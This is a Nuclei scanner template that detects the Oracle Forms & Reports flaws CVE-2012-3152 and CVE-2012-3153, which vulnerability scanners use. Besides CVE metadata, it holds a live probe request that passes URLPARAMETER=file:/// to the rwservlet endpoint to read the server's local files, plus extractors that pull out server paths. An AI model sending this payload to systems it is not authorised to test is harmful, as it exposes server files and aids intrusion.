nuclei-templates/http/cves/2012/CVE-2012-3153.yaml

65 lines
1.9 KiB
YAML

id: CVE-2012-3153
info:
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
author: Sid Ahmed MALAOUI @ Realistic Security
severity: medium
description: |
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
vectors related to Report Server Component.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
- https://www.oracle.com/security-alerts/cpuoct2012.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2012-3153
cwe-id: NVD-CWE-noinfo
epss-score: 0.97048
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
epss-percentile: 0.99647
metadata:
max-request: 2
vendor: oracle
product: fusion_middleware
tags: cve,cve2012,oracle,rce,edb
http:
- method: GET
path:
- "{{BaseURL}}/reports/rwservlet/showenv"
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Reports Servlet")'
- type: dsl
dsl:
- '!contains(body_2, "<html")'
- '!contains(body_2, "<HTML")'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: windows_working_path
regex:
- ".?.?\\\\.*\\\\showenv"
- type: regex
name: linux_working_path
regex:
- "/.*/showenv"